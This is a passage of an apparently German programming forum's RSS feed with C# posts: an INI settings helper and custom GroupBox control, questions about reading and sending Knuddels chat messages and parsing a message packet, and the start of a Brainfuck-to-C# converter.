#0000BB">value</span><span style="color: #007700">).</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #0000BB">Environment</span><span style="color: #007700">.</span><span style="color: #0000BB">NewLine</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">///&nbsp;&lt;summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;Fügt&nbsp;ein&nbsp;Kommentar&nbsp;hinzu<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;/summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;param&nbsp;name="comment"&gt;Der&nbsp;Kommentar&lt;/param&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">public&nbsp;</span><span style="color: #0000BB">void&nbsp;WriteComment</span><span style="color: #007700">(</span><span style="color: #0000BB">String&nbsp;comment</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">configFileWriter</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #0000BB">COMMENT_CHAR</span><span style="color: #007700">).</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"&nbsp;"</span><span style="color: #007700">).</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #0000BB">comment</span><span style="color: #007700">).</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #0000BB">Environment</span><span style="color: #007700">.</span><span style="color: #0000BB">NewLine</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">///&nbsp;&lt;summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;Schreibt&nbsp;die&nbsp;Werte&nbsp;und&nbsp;Kommentare&nbsp;schlussendlich&nbsp;in&nbsp;die&nbsp;Datei<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;/summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">public&nbsp;</span><span style="color: #0000BB">void&nbsp;WriteToFile</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">StreamWriter&nbsp;sw&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">StreamWriter</span><span style="color: #007700">(</span><span style="color: #0000BB">fileName</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">sw</span><span style="color: #007700">.</span><span style="color: #0000BB">Write</span><span style="color: #007700">(</span><span style="color: #0000BB">configFileWriter</span><span style="color: #007700">.</span><span style="color: #0000BB">Remove</span><span style="color: #007700">(</span><span style="color: #0000BB">configFileWriter</span><span style="color: #007700">.</span><span style="color: #0000BB">Length&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">).</span><span style="color: #0000BB">ToString</span><span style="color: #007700">());<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">sw</span><span style="color: #007700">.</span><span style="color: #0000BB">Close</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;catch&nbsp;(</span><span style="color: #0000BB">Exception&nbsp;x</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Fehler&nbsp;beim&nbsp;Schreiben&nbsp;der&nbsp;Datei:"&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #0000BB">x</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">#endregion<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">}<br />}&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Example:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #FF8000">//Schreiben<br /></span><span style="color: #0000BB">Util</span><span style="color: #007700">.</span><span style="color: #0000BB">SettingsHandler&nbsp;handler&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">Util</span><span style="color: #007700">.</span><span style="color: #0000BB">SettingsHandler</span><span style="color: #007700">(</span><span style="color: #DD0000">"settings.ini"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">handler</span><span style="color: #007700">.</span><span style="color: #0000BB">WriteComment</span><span style="color: #007700">(</span><span style="color: #DD0000">"Ich&nbsp;bin&nbsp;eine&nbsp;Beispieldatei!"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">handler</span><span style="color: #007700">.</span><span style="color: #0000BB">Write</span><span style="color: #007700">&lt;</span><span style="color: #0000BB">bool</span><span style="color: #007700">&gt;(</span><span style="color: #DD0000">"MENTOS_IST_GEIL"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">handler</span><span style="color: #007700">.</span><span style="color: #0000BB">WriteToFile</span><span style="color: #007700">();<br /></span><span style="color: #FF8000">//Lesen<br /></span><span style="color: #0000BB">Util</span><span style="color: #007700">.</span><span style="color: #0000BB">SettingsHandler&nbsp;handler&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">Util</span><span style="color: #007700">.</span><span style="color: #0000BB">SettingsHandler</span><span style="color: #007700">(</span><span style="color: #DD0000">"config/settings.ini"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">handler</span><span style="color: #007700">.</span><span style="color: #0000BB">ReadFile</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">bool&nbsp;mentos&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">handler</span><span style="color: #007700">.</span><span style="color: #0000BB">Get</span><span style="color: #007700">&lt;</span><span style="color: #0000BB">bool</span><span style="color: #007700">&gt;(</span><span style="color: #DD0000">"MENTOS_IST_GEIL"</span><span style="color: #007700">);&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Wie gesagt nur für kleine Projekte - aber dafür reicht das Ding :)<br />
           
</div>
</div>
</div><br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>ExtendedGroupBox</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
Eine GroupBox, bei der man die RandFarbe sowie die Farbe der Überschrift anpassen kann!<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Collections</span><span style="color: #007700">.</span><span style="color: #0000BB">Generic</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Linq</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Text</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Windows</span><span style="color: #007700">.</span><span style="color: #0000BB">Forms</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Drawing</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">ComponentModel</span><span style="color: #007700">;<br /><br />namespace&nbsp;</span><span style="color: #0000BB">Components<br /></span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;class&nbsp;</span><span style="color: #0000BB">ExtendedGroupBox&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">GroupBox<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;</span><span style="color: #0000BB">Category</span><span style="color: #007700">(</span><span style="color: #DD0000">"Appearance"</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">DefaultValue</span><span style="color: #007700">(</span><span style="color: #0000BB">typeof</span><span style="color: #007700">(</span><span style="color: #0000BB">Color</span><span style="color: #007700">),&nbsp;</span><span style="color: #DD0000">"White"</span><span style="color: #007700">)&#93;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;</span><span style="color: #0000BB">Description</span><span style="color: #007700">(</span><span style="color: #DD0000">"The&nbsp;Font-Color&nbsp;of&nbsp;the&nbsp;caption"</span><span style="color: #007700">)&#93;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">Color&nbsp;CaptionColor</span><span style="color: #007700">{&nbsp;</span><span style="color: #0000BB">get</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">set</span><span style="color: #007700">;&nbsp;}<br /><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;</span><span style="color: #0000BB">Category</span><span style="color: #007700">(</span><span style="color: #DD0000">"Appearance"</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">DefaultValue</span><span style="color: #007700">(</span><span style="color: #0000BB">typeof</span><span style="color: #007700">(</span><span style="color: #0000BB">Color</span><span style="color: #007700">),&nbsp;</span><span style="color: #DD0000">"White"</span><span style="color: #007700">)&#93;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;</span><span style="color: #0000BB">Description</span><span style="color: #007700">(</span><span style="color: #DD0000">"The&nbsp;Border-Color"</span><span style="color: #007700">)&#93;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">Color&nbsp;BorderColor&nbsp;</span><span style="color: #007700">{&nbsp;</span><span style="color: #0000BB">get</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">set</span><span style="color: #007700">;&nbsp;}<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;protected&nbsp;</span><span style="color: #0000BB">override&nbsp;void&nbsp;OnPaint</span><span style="color: #007700">(</span><span style="color: #0000BB">PaintEventArgs&nbsp;e</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Pen&nbsp;p&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">Pen</span><span style="color: #007700">(</span><span style="color: #0000BB">BorderColor</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">2</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Int32&nbsp;x&nbsp;</span><span style="color: #007700">=&nbsp;(int)</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">Graphics</span><span style="color: #007700">.</span><span style="color: #0000BB">MeasureString</span><span style="color: #007700">(</span><span style="color: #0000BB">Text</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">Font</span><span style="color: #007700">).</span><span style="color: #0000BB">Width</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Int32&nbsp;y&nbsp;</span><span style="color: #007700">=&nbsp;(int)</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">Graphics</span><span style="color: #007700">.</span><span style="color: #0000BB">MeasureString</span><span style="color: #007700">(</span><span style="color: #0000BB">Text</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">Font</span><span style="color: #007700">).</span><span style="color: #0000BB">Height&nbsp;</span><span style="color: #007700">/&nbsp;</span><span style="color: #0000BB">2</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">Graphics</span><span style="color: #007700">.</span><span style="color: #0000BB">DrawRectangle</span><span style="color: #007700">(</span><span style="color: #0000BB">p</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">y</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">ClipRectangle</span><span style="color: #007700">.</span><span style="color: #0000BB">Width&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">2</span><span style="color: #007700">,&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">ClipRectangle</span><span style="color: #007700">.</span><span style="color: #0000BB">Height&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">2&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">y</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">Graphics</span><span style="color: #007700">.</span><span style="color: #0000BB">FillRectangle</span><span style="color: #007700">(new&nbsp;</span><span style="color: #0000BB">SolidBrush</span><span style="color: #007700">(</span><span style="color: #0000BB">BackColor</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">9</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">y&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">x</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">y</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">Graphics</span><span style="color: #007700">.</span><span style="color: #0000BB">DrawString</span><span style="color: #007700">(</span><span style="color: #0000BB">Text</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">Font</span><span style="color: #007700">,&nbsp;new&nbsp;</span><span style="color: #0000BB">SolidBrush</span><span style="color: #007700">(</span><span style="color: #0000BB">CaptionColor</span><span style="color: #007700">),&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">10</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//base.OnPaint(e);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">}<br />&nbsp;&nbsp;&nbsp;&nbsp;}<br />}&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>
</div>
</div>
</div><br />
Vielleicht kann man diesen Thread ja pinnen ;)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Mentos</dc:creator>
			<guid isPermaLink="true">net-94/snippets-12901</guid>
		</item>
		<item>
			<title><![CDATA[C# [S] BSP Project]]></title>
			<link>net-94/s-bsp-project-12632?goto=newpost</link>
			<pubDate>Wed, 23 May 2012 17:49:16 GMT</pubDate>
			<description><![CDATA[Hallo, 
 
Ich suche ein Beispielproject [Visual Studio 2010] 
an dem ich mich orientiernen kann wie ich aus C# auf den Knuddels Chat zugreifen...]]></description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
Ich suche ein Beispielproject [Visual Studio 2010]<br />
an dem ich mich orientiernen kann wie ich aus C# auf den Knuddels Chat zugreifen kann....<br />
Es sollte folgendes enthalten:<br />
auslesen des Chatverlaufes,<br />
senden von Chatnachrichten.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>ekke</dc:creator>
			<guid isPermaLink="true">net-94/s-bsp-project-12632</guid>
		</item>
		<item>
			<title>C# Knuddels Nachrichtenabsender auslesen</title>
			<link>net-94/knuddels-nachrichtenabsender-auslesen-12616?goto=newpost</link>
			<pubDate>Wed, 23 May 2012 15:31:52 GMT</pubDate>
			<description>Hey, ich hab da mal ein Problem und zwar: 
 
Ich möchte den Nick vom Sender einer /m ausgeben, aber bei mir kommt der Nick immer 3fach xD 
 
So sieht...</description>
			<content:encoded><![CDATA[<div>Hey, ich hab da mal ein Problem und zwar:<br />
<br />
Ich möchte den Nick vom Sender einer /m ausgeben, aber bei mir kommt der Nick immer 3fach xD<br />
<br />
So sieht halt das Paket aus, wenn man ne' /m bekommt.<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			r\0James\0EMPFÄNGER\0-\0°%-1°°r°°BB°_°m°°&gt;_hSENDER|/serverpp &quot;|/w &quot;&lt;°°m°_°° hat dir gerade eine Nachricht geschickt. Sie liegt nun in deinem °&gt;_hBriefkasten|/m&lt;°.#°&gt;layout/mail_closed-outerglow...h_13.png&lt;&gt;--&lt;&gt;|/m ?SENDER&lt;&gt;--&lt;° _°BB&gt;Jetzt lesen|/m ?SENDER&lt;r°_\0 \0
			
		<hr />
	</div>
</div>So sieht mein Code aus:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">notifyIcon1</span><span style="color: #007700">.</span><span style="color: #0000BB">BalloonTipText&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">String</span><span style="color: #007700">.</span><span style="color: #0000BB">Format</span><span style="color: #007700">(</span><span style="color: #DD0000">"Wir&nbsp;haben&nbsp;eine&nbsp;/m&nbsp;vom&nbsp;Admin&nbsp;{0}&nbsp;bekommen!"</span><span style="color: #007700">,</span><span style="color: #0000BB">token</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">4</span><span style="color: #007700">&#93;.</span><span style="color: #0000BB">Replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"°%-1°°r°°BB°_°m°°&gt;_h"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">.Empty).</span><span style="color: #0000BB">Replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"|/serverpp&nbsp;\"|/w&nbsp;\"&lt;°°m°_°°&nbsp;hat&nbsp;dir&nbsp;gerade&nbsp;eine&nbsp;Nachricht&nbsp;geschickt.&nbsp;Sie&nbsp;liegt&nbsp;nun&nbsp;in&nbsp;deinem&nbsp;°&gt;_hBriefkasten|/m&lt;°.#°&gt;layout/mail_closed-outerglow...h_13.png&lt;&gt;--&lt;&gt;|/m&nbsp;?"</span><span style="color: #007700">,</span><span style="color: #0000BB">String</span><span style="color: #007700">.Empty).</span><span style="color: #0000BB">Replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"&lt;&gt;--&lt;°&nbsp;_°BB&gt;Jetzt&nbsp;lesen|/m&nbsp;?"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">.Empty).</span><span style="color: #0000BB">Replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"&lt;r°_"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">.Empty)));</span><span style="color: #FF8000">//&nbsp;Text&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Nun kommt der Nick halt immer 3x..Wie mache ich das, dass er den Nick nur 1x anzeigt? :s</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Saad</dc:creator>
			<guid isPermaLink="true">net-94/knuddels-nachrichtenabsender-auslesen-12616</guid>
		</item>
		<item>
			<title>C# Brainfuck2C# converter</title>
			<link>net-94/brainfuck2c-converter-12561?goto=newpost</link>
			<pubDate>Tue, 22 May 2012 10:43:02 GMT</pubDate>
			<description>PHP: 
--------- 
public static string bf2cshrp(string Code) { 
        System.Text.StringBuilder strBuild = new System.Text.StringBuilder(); 
       ...</description>
			<content:encoded><![CDATA[<div><div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">public&nbsp;static&nbsp;</span><span style="color: #0000BB">string&nbsp;bf2cshrp</span><span style="color: #007700">(</span><span style="color: #0000BB">string&nbsp;Code</span><span style="color: #007700">)&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Text</span><span style="color: #007700">.</span><span style="color: #0000BB">StringBuilder&nbsp;strBuild&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Text</span><span style="color: #007700">.</span><span style="color: #0000BB">StringBuilder</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"using&nbsp;System;\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"public&nbsp;class&nbsp;bfcode\n{\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"static&nbsp;void&nbsp;Main()\n{\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"byte&#91;&#93;&nbsp;arr&nbsp;=&nbsp;new&nbsp;byte&#91;30000&#93;;\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"int&nbsp;place&nbsp;=&nbsp;0;\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for(</span><span style="color: #0000BB">int&nbsp;i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">i&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">Code</span><span style="color: #007700">.</span><span style="color: #0000BB">Length</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">i</span><span style="color: #007700">++)&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;switch(</span><span style="color: #0000BB">Code</span><span style="color: #007700">.</span><span style="color: #0000BB">Substring</span><span style="color: #007700">(</span><span style="color: #0000BB">i</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">))&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">"&gt;"</span><span style="color: #007700">:<br 